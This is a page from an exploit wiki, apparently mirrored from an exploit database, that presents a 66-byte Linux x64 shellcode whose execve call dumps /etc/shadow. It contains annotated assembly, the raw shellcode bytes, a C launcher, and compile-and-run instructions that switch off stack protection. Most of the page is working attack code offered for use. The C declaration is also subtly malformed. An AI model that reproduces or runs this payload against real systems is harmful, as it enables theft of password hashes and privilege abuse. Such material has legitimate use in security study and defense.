Loading
0

Linux/x64 – execve (cat /etc/shadow) Shellcode (66 bytes)

PWNWIK.COM

,

Shellcode

# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
# Author: Felipe Winsnes
# Tested on: Debian x64
# Shellcode Length: 66
 
/*
global _start
 
_start:
 
       xor rax, rax                   ; Zeroes out RAX.
       xor rbp, rbp                   ; Zeroes out RBP.
 
       push rax                       ; Pushes RAX's NULL-DWORD.
 
       mov rbp, 0x776f646168732f63    ; Moves value "wodahs/c" into RBP.
       push rbp                       ; Pushes the vaueof RBP into the Stack.
 
       mov rbp, 0x74652f2f2f2f2f2f    ; Moves value "te//////" into RBP.
       push rbp                       ; Pushes the vaue of RBP into the Stack.
 
       mov rbp, rsp                   ; Copies the value of the Stack into RBP.
       push rax                       ; Pushes RAX's NULL-DWORD.
 
       mov rbx, 0x7461632f6e69622f    ; Moves value "tac/nib/" into RBX.
       push rbx                       ; Pushes the vaue of RBX into the Stack.
 
       mov rbx, rsp                   ; Copies the value of the Stack into RBX.
 
       mov rdi, rsp                   ; Copies the value of the Stack into RDI.
       push rax                       ; Pushes RAX's NULL-DWORD.
 
       mov rdx, rsp                   ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
 
       push rbp                       ; Pushes the vaue of RBP into the Stack.
       push rbx                       ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
 
       mov rsi, rsp                   ; Copies this entire string from the Stack into RSI.
 
       push word 59                   ; Pushes the value 59 (syscall value for execve in the x64 format).
       pop ax                         ; Pops this value into AX so there are no NULLs.
       syscall                        ; The syscall is executed.
*/
 
 
/*
Usage:
email protected:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
email protected:~/assembly/execve/cat$ ./cat_shadow
*/
 
#include <stdio.h>
 
unsigned char shellcode = \
"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
 
int main()
{
 
    int (*ret)() = (int(*)())shellcode;
    ret();
}
 
#  0day.today 2021-04-05  #

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库